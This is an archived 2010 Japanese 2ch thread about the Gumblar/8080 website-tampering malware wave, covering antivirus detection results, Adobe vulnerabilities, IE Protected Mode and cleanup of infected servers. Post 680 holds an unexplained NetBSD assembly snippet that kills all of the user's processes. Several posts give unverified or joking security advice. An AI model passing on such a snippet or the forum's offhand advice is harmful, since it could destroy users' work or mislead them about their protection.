どこのセキュソフトも本格的な対策は取ってないってこと？
586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:40:13 ]: >>581
まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな？ｗ
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585
何を以て本格的な対策と言うのか？そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ！とか絶対に思わないこと
587 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:44:30 ]: >>585
いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず
588 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:52:18 ]: 今のところついてってるのはNOD32だけだね
ユーザーの対策が出来ていても、htmlに埋め込まれたドロッﾊﾟｰは取り込んでしまうからね。
それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。
JAVAもフラッシュも使えないネットなんて
経済的損失が計り知れなくなるだろう。
589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:55:53 ]: 業者起きたのか。釣り針でけえな
590 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:57:19 ]: NOD32（笑）
591 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:58:04 ]: JAVAとJAVAScriptの区別は必要だな
592 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:58:51 ]: おおっNOD32一番乗りか？と思いきや別のサイトのスクリプトでは・・・
偶然引っかかっただけだな

結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262897785
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262897301
結果: 0/41
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262897643

85 名前：滑車(東日本)[sage] 投稿日：2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
今>>1のソースをvirustotalにおくったらNOD32だけが反応した
tsushima.2ch.net/test/read.cgi/news/1262886266/85-87
593 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:59:26 ]: >>589
>>588はこのことだね。
tsushima.2ch.net/test/read.cgi/news/1262886266/85-87n
594 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:01:47 ]: >>593　それ書いたのは僕なんですがAvast!信者です。
595 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:01:49 ]: さて、変わったのはコメント行だけかな？
どうやって指令してるのかな？
596 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:04:58 ]: 犬HKラジオでもトップニュース扱いだな。
597 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:05:22 ]: 受付のスクリプトに反応するかしないかの問題であって、他のベンダーが絶対検知できないって訳じゃないでしょ
要はどの段階で検知するかの問題
後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん

でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど？
製品比較やりたいなら、適当な別スレでどうぞ
598 名前：592 mailto:sage [2010/01/08(金) 06:12:34 ]: 自分はあくまで検証目的で貼っただけなんだが・・・
気を悪くしたなら少し控えるか
定義データに左右されないらしいノートンの侵入検知の例もあるしな
599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:16:18 ]: >>598
いやいや、検証目的としてはぜんぜんおｋだし>>592のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいｗ
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってｻｰｾﾝ
600 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 06:19:34 ]: >>599
おｋ
ではこれからも節度を持った上で貼らせてもらおう
601 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 07:21:17 ]: なんだかすげえ馬鹿スレになってきたな
602 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 07:43:56 ]: >>522
ノートンは確信犯だってば
芸能アバターのせい
603 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 08:03:40 ]: 良い悪いすんなっても気になるのが人情だろ。
人間見ないでルールだけ見る奴って何なの？
604 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 08:09:03 ]: avast以外大丈夫だよ
605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 08:53:47 ]: そもそも、インターネットからFTPで更新できるってのがもういまの時代はダメダメだろ
特定のIPアドレスに制限するとか、VPN必須にするとかしないと
606 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 09:25:29 ]: >>604
なにが？avast!以外大丈夫なのかな？
607 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 09:37:40 ]: これ明らかに世界中のインターネット絶滅推進派が仕組んだテロだろ
608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 09:47:27 ]: まずいなあ、ウイルス本体も新型みたいだぞ

結果: 0/40
ttp://www.virustotal.com/jp/analisis/9c063a80b9be621983142f51b500161003ca8e6b8ce7e3127c249fb1e34b184c-1262904786
avast!Anti-Virus Part120
pc11.2ch.net/test/read.cgi/sec/1261930389/448
609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 09:48:34 ]: こういうネズミ算式に増えていく無差別で大規模な改竄は今まで何度かあったけど、
今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。
610 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 10:27:03 ]: >>609
年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな
611 名前：sage ◆sage/xLnlI [2010/01/08(金) 10:28:46 ]: >>608
（'A`)
612 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:13:29 ]: 結局どうすりゃいいのよ、誰もわかんないのかよ
613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:16:20 ]: lanケーブルをハサミでチョキンとやれば確実に防げるぞ
614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:18:47 ]: FTPの情報どうやって抜いてんの？
FFFTPのレジストリに生で記録されてんのか？
iniに出力するようにしてるんだが、どうだろうか
615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:29:36 ]: 会社で借りてるサーバにうちの馬鹿が感染させたんだが、
上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる

書き換えられるたびにコード削除していくの疲れたよ
616 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:30:16 ]: FTP通信したときのパケットそのものを見てると思う
FTPソフト側での回避は無理
617 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:33:20 ]: >>615
乙
感染したのは8080？
書き換えられる頻度はどのくらい？
618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:38:49 ]: >>615
それはありえんｗ
619 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:50:47 ]: >>615
乙
アホだなー
620 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 11:55:01 ]: >>615
なんで変えられないんだろう？
感染をもみ消したいのかな？

更に大きな感染呼び込んで信用失うだけだと思うが。
621 名前：sage ◆sage/xLnlI [2010/01/08(金) 12:09:16 ]: www.zenoah.coアッー！jp/

実験台で見たらコードがなかった・・・
622 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:09:31 ]: >>617
まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ

今は/*LGPL*/から始まって8!@0@^8)@0？/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな

一部/*GNU GPL*/～のまま放っておいたものが/*LGPL*/～に置き換わってた
追記じゃないみたいだね

>>620
全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな
623 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:11:02 ]: >>622
なんなのその原始時代みたいな会社ｗ
624 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:11:25 BE:235456823-2BP(7777)]: 他人の不幸で飯が旨い
625 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:15:13 ]: どうせ感染したというアナウンスもしてないんだろ

てういか今後も感染するから出せないかｗ
626 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:15:39 ]: >>623
実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る
627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:18:01 ]: >>626
そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。

いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわｗ
628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:19:59 ]: >>626
会社としてやばい
すぐに転職を勧める
629 名前：sage ◆sage/xLnlI [2010/01/08(金) 12:28:39 ]: up3.viploader.net/ippan/src/vlippan054095.png

一部の記号を消したらこうなった
630 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:33:03 ]: 誰か検体上げてくれ
631 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 12:33:58 ]: なんでサーバーの管理者がWindowsなんか使ってるんだ？
普通は違うOSを使うと思うんだけどな
632 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:34:52 ]: >>631
Webデザイナのマシンに感染したとか
633 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:40:04 ]: ずっと鯖OSさわってるのは鯖屋であって
鯖管とは違くないか

Telnetあるし
634 名前：sage ◆sage/xLnlI [2010/01/08(金) 12:41:51 ]: up3.viploader.net/pc/src/vlpc001718.png

hundekuru
635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:42:21 ]: ソースチェッカーオンラインみたいなサイトないの？
怖くて未知のURLは踏めん・・・
636 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:43:32 ]: Telnetってｗｗ
いつの時代だよｗｗｗ
637 名前：sage ◆sage/xLnlI [2010/01/08(金) 12:43:45 ]: 仮想でAVAST止めて行ったら仮想じゃない方攻撃されてノートン先生に止められたｗｗｗｗｗｗｗ
638 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:44:46 ]: 顧客情報にアクセスできるショッピングサイトの管理者はすぐに対応しろ
639 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 12:45:22 ]: >>625
ttp://www.aguse.jp/
640 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:48:33 ]: >>637
そのゲストOS・・・プロダクトキー入れてる？
盗まれるぞ・・・
641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 12:54:44 ]: >>281
それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど
642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:00:04 ]: >>641
WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々
643 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:12:35 ]: >>642
MSDNに該当する記事有り
Windows Firewall and Windows Firewall with Advanced Security (Windows)
ttp://msdn.microsoft.com/en-us/library/aa366453(VS.85).aspx
644 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:31:12 ]: >>640
このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・
645 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:33:10 ]: >>642
なにそれ
だめじゃん
646 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:34:22 ]: そもそも、Windowsを管理者権限で常に使用してるようなやつが
Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ

通常使用は一般ユーザーで使用すればいいのに
7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて
すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい
647 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:36:03 ]: >>644
マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい
648 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:36:15 ]: 一般ユーザーですら管理者権限
流石Microsoft
649 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:37:32 ]: >>647
大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからｂ
650 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:38:12 ]: >>648
なアッー！っなアッー！んだアッー！ってええええええええええええええええええええええええええええええええええええええええ
651 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:40:03 ]: >>647
アッー！と、一回M$のXPModeで、ひどい目にアッー！っアッー！から使いたくない
652 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:41:18 ]: ◆sage/xLnlI、アウト～
653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:41:18 ]: >>646
明示的に表示されてないとfirewallスルーできないよね
できないといって><
654 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:42:12 ]: >>652
なアッー！んで？
655 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:42:51 ]: 結論「ユーザーの意識改革が必要」
656 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:43:52 ]: 少々知識が足りなかったようだな
657 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:44:29 ]: Firefoxがクラッシュしまアッー！した
658 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:44:59 ]: NGNameに追加 sage </b>◆sage/xLnlI <b>
659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:45:51 ]: 話は全部聞かせて貰ったぞ！（ガラッ
sage ◆sage/xLnlIのプロダクトキーは既に流出している
660 名前：sage ◆sage/xLnlI [2010/01/08(金) 13:46:35 ]: >>659
えっ

どうゆうこと？
661 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 13:59:27 ]: 既に感染しているかどうかを調べる方法がないことだけは分かった
662 名前：sage ◆sage/xLnlI [2010/01/08(金) 14:00:29 ]: >>661
うｎ

windows7の感染確認方法知ってす人いないよね？・？
663 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:02:03 ]: >>646

そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...
664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:04:28 ]: ずっとこんなイタチゴッコ続けるのかよ。
感染したらUbuntuにする。少なくとも嫁のPCは。
665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:04:34 ]: もそもそ
666 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:05:52 ]: >>664
上流のdebianにしろｋｓｇ
667 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:06:08 ]: むしろ感染してしまえば楽になるような気がする
俺は遠慮するけど
668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:10:35 ]: とりあえず現状、普通のクライアントPCが感染してるかどうかの判断ってどうやってんの？
春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが
669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:12:00 ]: ウイルスの検体マダー！？
670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:12:47 ]: >>663
自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう
671 名前：sage ◆sage/xLnlI [2010/01/08(金) 14:12:54 ]: >>669
>>76
672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:14:31 ]: プロダクトキーを入力せずにインスコ→被害者向けの特価で正規のプロダクトキー購入→ウマー
これがMicrosoftクオリティーなのか・・・
673 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:26:03 ]: >>668
ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない
674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:28:05 ]: >>673
嘘の情報ってｗｗ
検体があればリバースエンジニアリングで動作くらい分かるだろJK
675 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 14:32:49 ]: >>663
つ別のユーザとして実行

これで動かないソフトのほとんどは動く。
676 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:32:53 ]: あっちこっちで呼び方が違うからもう何がなんだか分からない
677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:33:42 ]: >>664
誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ

NetBSDとかOpenBSDとか
678 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:33:58 ]: 普通のクライアントPCは感染してるかどうか確認する方法ないの？
マジで？

全台クリーンインストールしろと言うのか
679 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:36:02 ]: >>678
新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる
680 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:37:00 ]: section .note.netbsd.ident
dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000

section .data

section .text
global _start

_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80
681 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:38:21 ]: >>648
マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。
682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:39:01 ]: AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
683 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:39:28 ]: >>681
誰でも簡単に権限昇格できるWindowsなんて（ｒｙ
684 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:43:17 ]: >>675

大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ～

Vistaが出てやっと対応したところのが多いじゃん
685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:46:15 ]: 【ネット】洋菓子「モロゾフ」のサイト、何者かが改ざん　閲覧すると新型ウイルス「ガンブラー」に感染する恐れがあったが、被害報告なし
1 ：おっおにぎりがほしいんだなφ ★：2010/01/06(水) 07:20:34 ID:???0
洋菓子メーカー「モロゾフ」（本社・神戸市）のインターネットサイトが
何者かに改ざんされる被害に遭っていたことが５日、わかった。

同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス
「ガンブラー」に感染する恐れがあったが、被害の報告はなく、
サイトは改善済みという。

同社の説明では、改ざんされたのは４日午後７時半～５日正午で、
感染や情報漏えいなどの連絡はない、としている。

↑
こういう「被害の報告は無く」ってのが一番怖いと思うんだが…
閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ？
686 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:48:00 ]: >>682
だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる
687 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:50:26 ]: 【今株馬鹿】GENOウイルスのお陰でウイルス対策会社の株が急騰
tsushima.2ch.net/test/read.cgi/news/1262929220/
688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:51:25 ]: 保護モードなんてバイパス出来るだろｗｗ
689 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:53:07 ]: >>686
IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの？
Adobeの脆弱性を突いた攻撃と何の関係があるの？
690 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:54:51 ]: 感染しているかどうかを調べる
今一番有力な方法を教えてくださひ。
691 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:56:19 ]: >>685
お前らモロゾフのHP見てみろｗ
mimizun.com/log/2ch/news4vip/1262612925/

1 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 22:48:45.86 ID:kMgcW7bI0
ttp://www.morozoff.co.jp/

なんだこれｗ

5 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 22:53:02.74 ID:+8J8P32m0
Javaのコンソールが起動してPCがすげー重くなった
なんか仕込まれてるの？

7 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 23:00:03.62 ID:euSlf2pA0
>>1
死ね

重いいいいいいいいいい
692 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:56:45 ]: webサイト作ったらわかるんじゃね？
改ざんされたら感染してる
693 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 14:59:14 ]: VPCでモロゾフを踏んでみた。
processmoniterでその時の挙動を調べてみたが、何も起こらない・・・
694 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:01:03 ]: 保護モードって、IEのプロセスを通常よりさらに限定された権限で
動作させることに一番の意味があるんだよ

保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない

保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない

このあたり呼んでみれば？
msdn.microsoft.com/ja-jp/library/bb250462(VS.85).aspx
695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:03:37 ]: >>692
適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか？
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。
696 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:03:51 ]: 保護モードバイパス美味しいです＾＾
CodeProject: A Developer's Survival Guide to IE Protected Mode. Free source code and programming help
ttp://www.codeproject.com/KB/vista-security/PMSurvivalGuide.aspx
697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:16:11 ]: >>693
そりゃあ、今踏んだって何も起こらなくて当然。
698 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:21:48 ]: >>694を素直に読むと、IEの保護モード有効下だとAdobe脆弱性回避できるように思えるけど実際は違うよな？
699 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:22:40 ]: 他サイトに飛ぶときに警告を出せば済む話だろう
２ちゃんを見習え
700 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:28:22 ]: >>694

>>99
99 ：名無しさん＠お腹いっぱい。：2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた（←阿呆）
/*GNU GPL*/～というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか？というウインドウが出てきて（VISTA）
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
（以下略）

これってつまり、IE保護モードで今回のリスクは回避されないんじゃね？
701 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:30:21 ]: 保護モードは一部回避可能だけど、
Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い
テストコードは出ても、実際にそれを使ったマルウェア等は出てない
702 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:30:29 ]: 感染実験したいからURLくれ
703 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:34:25 ]: >>696
そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん
704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 15:42:33 ]: >>694
>Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。

↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと
705 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:02:33 ]: ＞＞脆弱性でやられてもまず影響が出ない
そういえばJavaがウイルスのローダーとして悪用されていた件
脆弱性以前の問題だよね・・・
706 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:22:12 ]: もうどんな防御しようと無意味なんじゃないかって思えてきた
707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:24:38 ]: OSなりブラウザを仮想化すれば良いではないか
708 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:28:59 ]: そういう手段しか思いつかないレベルってことですね
709 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:33:53 ]: >>706-708
NO

Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純
710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:35:30 ]: 警視庁も動きだしたそうじゃないか
どこまでできるのかわからんけど
711 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 16:37:16 ]: >>709
>MSが情報公開して協力
誰に？
712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:38:20 ]: >>711
Adobeに
713 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 16:46:25 ]: JavaもReaderもアンインストール
WindowsとFlashは最新
ばっちこいや
714 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:51:55 ]: >>713
最終ステップ：Windowsもアンインストール
715 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 16:54:29 ]: Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
716 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:09:01 ]: WIN7は感染しないんですか？
717 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:21:20 ]: ゲームやケータイのブラウザが最強だな
感染する場所がありゃしないぜ！
718 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:22:16 ]: もうみんなでマカーになろうよ
719 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:34:42 ]: つlinux
720 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:38:33 ]: 凄い初心者な質問で申し訳ないけど
普段から使ってるもの一通り最新版にしておけばGumblarに限らず
大体のウイルスにかからないもんなの？
721 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:42:15 ]: さきほどGENOウィルスが仕込まれてる可能性の高いURLを踏んでしまいました。
慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの（www29.atwiki.jp/geno/）GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか？
722 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:46:26 ]: >>720
古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ

それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども
723 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:47:13 ]: >>720
一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事
724 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:49:41 ]: >>709
Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。
725 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:51:14 ]: >>720
新型はふせげねー、新型にあたったらクリーンインストールするしかない
726 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:51:38 ]: やっとAdobeの修正がきたみたいだね
